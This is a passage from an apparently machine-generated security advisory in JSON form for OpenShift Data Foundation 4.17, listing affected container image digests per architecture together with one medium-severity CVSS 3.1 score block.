"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
